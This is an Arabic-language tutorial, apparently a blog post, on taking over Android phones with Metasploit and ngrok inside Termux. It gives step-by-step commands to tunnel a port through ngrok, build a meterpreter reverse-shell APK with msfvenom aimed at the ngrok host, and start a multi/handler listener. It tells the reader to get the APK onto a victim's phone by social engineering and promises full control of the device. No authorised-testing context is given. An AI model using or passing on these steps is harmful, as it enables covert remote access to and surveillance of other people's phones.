اختراق الاندرويد بالميتاسبلوت و ngrok في (ترمكس - Termux)

اختراق الاندرويد بالميتاسبلوت و ngrok في (ترمكس - Termux)

 كيفية اختراق الاندرويد عن طريق Metasploit & Ngrok باستخدام Termux

من خلال هذا المقال ، أريد أن أوضح لكم كيف يمكنك بسهولة اختراق الاندرويد باستخدام metasploit و ngrok في تطبيق Termux.

فلنبدأ من خلال التعرف على مشروع الميتاسبلوت - metasploit

الميتاسبلويت هو إطار اختبار الاختراق الأكثر استخدامًا في العالم والذي يمكّنك من العثور على الثغرات الأمنية واستغلالها والتحقق من مدى صحتها وخطورتها على الانظمة المستهدفة. تم تطويره بواسطة Rapid7 وهو المنصة الأكثر تفضيلاً لاختبار الاختراق و الهكر.

اقرأ أيضا : 

لماذا نستخدم NGROK ؟

نجروك اداة بديلة لـ برنامج تثبيت الاي بي الخارجي NO-IP او ما يسمى خدمة Dynamic DNS. ملحق للمساعدة في اختبار الشبكات الخارجية (WAN) باستخدام metasploit لتجنب مشكل تغير الاي بي IP Dynamic، وجود اي بي ثابت IP-Static وما إلى ذلك باستخدام Ngrok يمكنك تخطي هذه المشاكل. لانه حين استخدامك لـ IP الخارجي الخاص بك اثناء اختراق الهاتف حتى لو تم الاختراق بنجاح ستفقد الاتصال بالضحية في اول اعادة تشغيل للروتر الخاص بك ويتغير الاي بي.

تثبيت تطبيق ترمكس Termux على الاندرويد

أولاً قم بتنزيل Termux من متجر PlayStore إلى هاتف Android الخاص بك.وقد تم الشرح في هذا المقال:

تطبيق تارموكس هواتف الاندرويد Termux

ستحتاج بعد ذلك إلى زيارة موقع Ngrok على الويب والاشتراك Signup أولاً. للحصول على حساب خاص بك.  ثم تنزيل نسخة البرنامج المناسبة إصدار linux (arm) على هاتف Android الخاص بك على حسب نوع معالج جهازك أو النواة 32 او 64 بت ، 

يمكنك معرفة نوع المعالج او النواة باستخدام الامر الاتي في ترمكس
uname -m

بعدها قم بتحميل النسخة المتوافقة مع هاتفك
x86_64 
aarch64 
وسوف يتم تنزيل الملف في هاتفك وسيكون لديك مفتاح المصادقة التوكن auth token والتي سنستخدمها لاحقًا لذلك لا تغلق علامة التبويب.

افتح Termux في هاتف Android الخاص بك واكتب الأمر  LS

ls

إذا كنت لا ترى مجلدًا باسم التخزين - storage ، فاكتب الأمر التالي.

termux-setup-storage

إذا قمت بكتابة الأمر Ls مرة أخرى ، فسترى مجلدًا باسم التخزين لفتح هذا النوع من المجلدات

cd storage

ثم انتقل إلى مجلد التنزيلات عن طريق كتابة الأمر

cd downloads

الآن إذا قمت بكتابة ls فسترى جميع التنزيلات الخاصة بك ، انسخ اسم ملف ngrok-stable-linux-arm.tgz واكتب الأمر

tar -xvzf filename

filename تضع مكانه اسم الملف الذي حملته من قبل على سبيل المثال ngrok-stable-linux-arm64.tgz

او يمكن ان يكون ngrok-stable-linux-arm.tgz ليصبح الامر بهذا الشكل

tar -xvzf ngrok-stable-linux-arm.tgz
او

tar -xvzf ngrok-stable-linux-arm64.tgz

سيقوم هذا الأمر بفك ضغط الملف الآن يمكنك نقل الملف من التنزيلات إلى Termux عن طريق كتابة الأمر

mv ngrok /$HOME

اكتب الآن

cd --

الآن ستصل إلى جذر termux لذا ستحتاج إلى تغيير أذونات المجلد الذي نقلته للتو عن طريق كتابة الأمر

chmod + x ngrok

معن الامر جعل الملف ngrok تنفيذي. 

chmod وتعني change mod و +x اختصار لــ execution

الآن لتشغيل او تنفيذ ملف برنامج نجروك

./ngrok

الآن سيُطلب منك مصادقة حسابك عن طريق نسخ رمز المصادقة من الصفحة حيث قمت بتنزيل ملف ngrok zip ، ونسخ رمز المصادقة، اكتب ما يلي بدون قوسين

./ngrok authtoken (your auth token)

الآن تمت مصادقة حسابك وسيتم حفظ رمزك المميز في ملف تكوين. 

افتح الآن نقطة الاتصال بجهاز Android الخاص بك 

تشغيل ngrok 

اكتب الأمر

./ngrok tcp 4543

يمكنك استعمال اي بورت تشاء أعطي 4543. الآن افتح جلسة termux جديدة عن طريق التمرير من اليسار والنقر على جلسة جديدة لا تغلق هذه الجلسة. في الجلسة الجديدة اكتب الأمر

pkg install unstable-repo

ثم سيُطلب منك تثبيت metasploit عن طريق كتابة الأمر

pkg install metasploit

الخطوة الحاسمة التالية هي إنشاء Payload

لإنشاء بايلود، ستحتاج إلى فهم كلمات رئيسية معينة مرتبطة بأي بايلود ميتاسبلويت. 

الكلمات الرئيسية أو البارمترات التي تهمنا هي LHOST (الاي بي ونضع مكانه عنوان نجروك) و (البورت)LPORT.

جلسة نجروك في ترموكس

LHOST = 0.tcp.ngrok.io (والذي يمكنك رؤيته في صف إعادة التوجيه في جلسة ngrok) & LPORT هو 17143  (وهو بجوار :)

الآن لإنشاء Payload باستخدام metasploit ، اكتب الأمر التالي

msfvenom -p android/meterpreter/reverse_tcp LHOST =0.tcp.ngrok.io LPORT = 17143 R> sample.apk

سينشئ الأمر أعلاه تطبيق Payload الذي سيتم تخزينه في جذر termux. لنقل التطبيق إلى نوع تخزين هاتفك

mv sample.apk /storage/emulated/0/

لقد وصلنا الآن إلى الخطوة النهائية والأكثر أهمية وهي استخدام إطار عمل metasploit للوصول إلى الجهاز المستهدف. 

لتشغيل metasploit اكتب:

msfconsole

سترى شاشة مثل هذه

ملاحظة: - 

يجب أن تكون جلسة NGROK متاحة عبر الإنترنت طوال العملية.

يمكنك إرسال ملف apk إلى الهدف الخاص بك بأي وسيلة سواء عن طريق الهندسة الاجتماعية أو أي طريقة أخرى.

الآن في جلسة metasploit ، اكتب الأوامر التالية واحدة تلو الأخرى

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4543

ستكون الأوامر المذكورة أعلاه هي نفسها للجميع إذا كنت تستخدم نفس المنفذ الخاص بي. الآن اكتب في النهاية للاختراق

exploit

بحلول هذا الوقت ، ستستمع إلى الاتصالات الموجودة على المنفذ المحدد ، والآن عندما يقوم الجهاز المستهدف بتثبيت التطبيق الذي قمت بإنشائه ، يمكنك إنشاء اتصال بالجهاز المستهدف وستحصل على تحكم كامل في الهاتف المستهدف.

عند إنشاء اتصال او الاختراق ، ستظهر شاشة مثل هذه

في جلسة meterpreter ، يمكنك كتابة الأمر help لإظهار جميع الخيارات المتاحة واستكشاف الأوامر

meterpreter  --help

تهانينا ، لقد تعلمت بنجاح كيفية اختراق Android المستهدف عبر الايبي الخارجي باستخدام metasploit و ngrok في ترمكس